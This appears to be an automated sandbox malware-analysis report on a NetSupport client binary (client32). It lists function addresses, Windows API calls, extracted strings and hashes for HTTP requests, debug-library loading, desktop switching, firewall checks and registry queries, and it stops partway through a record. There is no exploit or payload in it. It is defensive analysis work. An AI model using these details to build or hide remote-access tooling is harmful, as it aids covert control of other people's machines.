                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$AvailableConnectDataHeapLoadOpenQuery
                                                                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                              • API String ID: 3929731738-913974648
                                                                                                                              • Opcode ID: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
                                                                                                                              • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                                              • Opcode Fuzzy Hash: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
                                                                                                                              • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                              • API String ID: 3192549508-611217420
                                                                                                                              • Opcode ID: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                              • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                                                              • Opcode Fuzzy Hash: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                              • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,7476EA30), ref: 11144173
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                                              • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                              • API String ID: 3874234733-2061581830
                                                                                                                              • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                              • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                                              • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                              • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D0B1340,?,0000001A), ref: 11028CFD
                                                                                                                              • _strrchr.LIBCMT ref: 11028D0C
                                                                                                                                • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                              • API String ID: 1609618855-357498123
                                                                                                                              • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                              • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                              • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                              • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 256synchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                                              • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                              • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                              • API String ID: 596640303-1725438197
                                                                                                                              • Opcode ID: 0a1b576f65a7968429431ee3ba87b6485455b62dca3929698d1018e27bd51e5d
                                                                                                                              • Instruction ID: 4f3bd53bc8d19e72287e58b17b31a22f9b89b15acabdf1a04f68b78acb210870
                                                                                                                              • Opcode Fuzzy Hash: 0a1b576f65a7968429431ee3ba87b6485455b62dca3929698d1018e27bd51e5d
                                                                                                                              • Instruction Fuzzy Hash: C2919274E0020A9BDF04DBE4CD90FEEF7B5AF55308F508259E8266B284DB74B905CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                              • GetTickCount.KERNEL32 ref: 111385E2
                                                                                                                                • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                              • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                                              • _memset.LIBCMT ref: 11138633
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                                              • _strrchr.LIBCMT ref: 11138658
                                                                                                                              • _free.LIBCMT ref: 111386AA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                              • API String ID: 711243594-1270230032
                                                                                                                              • Opcode ID: 5c416ae25e92e1f7c23c6732e1dc5c8969888a590068a84155f7d5ebe97f05f0
                                                                                                                              • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                                              • Opcode Fuzzy Hash: 5c416ae25e92e1f7c23c6732e1dc5c8969888a590068a84155f7d5ebe97f05f0
                                                                                                                              • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 484 11145c70-11145c8b 485 11145c91-11145cad GetVersionExA 484->485 486 11145e6c-11145e73 484->486 485->486 487 11145cb3-11145cba 485->487 488 11145e75-11145e85 call 11162bb7 486->488 489 11145e86-11145e91 486->489 487->486 490 11145cc0-11145ce7 RegOpenKeyExA 487->490 489->488 492 11145e93 489->492 490->486 493 11145ced-11145d5e call 11162be0 call 11143bd0 * 2 490->493 495 11145ed4-11145ee7 call 11162bb7 492->495 496 11145e95-11145ea0 492->496 512 11145d64-11145d82 call 11163ca7 call 111648ed 493->512 513 11145e5f-11145e66 RegCloseKey 493->513 496->488 499 11145ea2 496->499 499->495 502 11145ea4-11145ea9 499->502 502->495 504 11145eab-11145ec1 call 11081f20 502->504 504->488 509 11145ec3-11145ed2 call 11163ca7 504->509 509->488 509->495 519 11145d84-11145d94 call 111648ed 512->519 520 11145d96-11145d99 512->520 513->486 519->520 522 11145d9c-11145daa call 11163ca7 520->522 523 11145d9b 520->523 527 11145db0-11145dd5 call 11164ed0 522->527 528 11145e5e 522->528 523->522 527->528 531 11145ddb-11145dde 527->531 528->513 531->528 532 11145de0-11145e3c call 11143bd0 * 2 531->532 536 11145e41-11145e4c 532->536 536->528 537 11145e4e-11145e59 536->537 537->528
                                                                                                                              APIs
                                                                                                                              • GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                              • _memset.LIBCMT ref: 11145CFD
                                                                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,775EC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                              • _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                              • API String ID: 3299820421-2117887902
                                                                                                                              • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                              • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                              • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                              • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                                              • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                                                              • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                                                              • GetLastError.KERNEL32 ref: 11103831
                                                                                                                              • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                                                              • GetLastError.KERNEL32 ref: 1110384F
                                                                                                                              Strings
                                                                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                                              • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                              • API String ID: 2036220054-60805735
                                                                                                                              • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                                              • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                                              • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
